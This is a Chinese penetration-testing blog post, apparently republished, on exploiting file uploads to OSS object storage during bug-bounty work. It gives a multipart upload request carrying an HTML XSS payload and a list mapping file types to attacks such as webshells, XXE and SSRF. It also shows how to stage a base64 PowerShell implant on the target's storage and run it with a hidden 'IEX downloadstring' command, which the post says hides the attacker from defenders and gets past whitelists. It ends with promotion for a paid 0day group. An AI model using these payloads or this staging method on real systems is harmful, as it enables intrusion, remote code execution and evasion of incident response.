2025-12-22 04:05:33 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文介绍了当发现文件上传到OSS但无法解析动态脚本时的两种利用技巧：一是上传HTML或SVG文件触发存储型XSS，二是上传PowerShell等脚本作为攻击跳板。文章提供了具体的Payload示例和文件上传漏洞利用方式Top10，帮助安全研究人员在SRC活动中挖掘更多漏洞。这些技巧虽然利用条件较为苛刻，但可以在特定情况下提高漏洞利用的成功率，同时也能防止蓝队溯源到真实服务器。 综合评分： 88 文章分类： 漏洞挖掘,渗透测试,SRC活动,WEB安全,漏洞分析

cover_image

OSS任意文件上传的小技巧|挖洞技巧

漏洞挖掘

渗透安全HackTwo

2024年5月20日 00:02 广东

0x01 前言

在日常挖SRC还有渗透时，很多时候我们可能会遇到一个情况，发现一个上传点可以上传文件但是不能解析！文件传到OSS去了。到这里可能有的师傅就已经开始离开这伤心站点了

虽然文件上传到OSS危害不大，但是我们组合其他漏洞打出一点小伤害还是能拿到SRC的一点泡面钱的，下面分享我常用的两个小tips供各位参考。

末尾可领取资源文件

0x02 OSS打XSS

漏洞场景：发现站点存在文件上传，但文件传到了OSS，并且无法解析动态脚本，为了能挣点泡面钱，可以尝试上传html来凑个存储XSS。

------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html
<script>alert(1)</script>------WebKitFormBoundary0orTsGAmHsHaAUgy--

有些网站限制了只能图片上传，这时可以试试传svg格式的图片

这里虽然是下载了传上去的文件但无法触发XSS，但是这里还可以用其他洞再打一波组合拳，但是漏洞利用条件也高了，所以有些SRC也就不收了

这里根据上传文件的后缀可以拓展其他攻击的方式，附上文件上传漏洞利用方式 Top10，感兴趣的师傅可以去研究研究

1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE2. SVG: 存储 XSS / SSRF / XXE3. GIF: 存储 XSS / SSRF4. CSV: CSV 注⼊5. XML: XXE6. AVI: LFI / SSRF7. HTML / JS : HTML 注⼊ / XSS / 开放重定向8. PNG / JPEG: 像素洪⽔攻击 (DoS)9. ZIP: RCE via LFI / DoS10. PDF / PPTX: SSRF / 盲打 XXE

0x03 OSS文件跳板

漏洞场景：发现站点存在文件上传，但文件传到了OSS，并且无法解析动态脚本。

这个和上面打XSS差不多一个意思，这里传我们的powershell脚本或者其他脚本到目标的OSS上，因为OSS只存储静态的文件那么我们就可以把上线的脚本传上去让其他主机来访问。

这里作为一个跳板也能防止蓝队溯源到你的真实服务器，让蓝队溯到其他人身上，但这也会把上线的脚本一直留在OSS上，所以后面还得做其他方面的防溯源的手段，所以还是有利有弊吧。

------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/+y9Wa/qSrIu+rzrV8yHLa21xNo1wIAxR9rSNTYY444eTJ1SyRjjBtw3YM49//1GZBoGY865VtXW1rkPV3dKUwyMnU1kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundary0orTsGAmHsHaAUgy--

‍命令执行上线主机

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://pikachu.test/vul/unsafeupload/uploads/favicon.html'))"

补充一点，在某些时候目标设置了某个高可信域名为白名单域名，只要是这个白名单域名的那么都是可信然后放行，如果是不可信的直接拦下审计，这时如果我们传了脚本上去就可以绕开目标的一些白名单策略。

0x05 总结

之前遇到这种情况，我也是上传html文件，说危害就说比如有xss、非法言语等，但是最近有了新的思路。喜欢的师傅可以点赞转发支持一下谢谢！

0x06 内部星球VIP介绍-V1.3更新啦！

如果你想学习更多渗透挖洞技术/技巧欢迎加入我们内部星球可获得内部工具字典和享受内部资源，包含网上一些付费工具。详情直接点击下方链接进入了解，需要加入的直接点击下方链接了解即可，觉得价格高的师傅可后台回复” 星球 “有优惠券名额有限先到先得！内部包含了网上需付费的0day/1day漏洞库，后续资源会更丰富在加入还是低价！

👉点击了解–>>内部VIP知识星球福利介绍V1.3版本-星球介绍****

结尾

免责声明

获取方法

回复“app” 获取 app渗透和app抓包教程

回复“渗透字典” 获取一些字典已重新划分处理（需要内部专属字典可加入星球获取，好字典不对外公开，持续整理中！）

回复“书籍” 获取网络安全相关经典书籍电子版pdf

最后必看

文章中的案例或工具仅面向合法授权的企业安全建设行为，如您需要测试内容的可用性，请自行搭建靶机环境，勿用于非法行为。如用于其他用途，由使用者承担全部法律及连带责任，与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断，不存在漏洞利用过程，不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。本工具或文章或来源于网络，若有侵权请联系作者删除，请在24小时内删除，请勿用于商业行为，自行查验是否具有后门，切勿相信软件内的广告！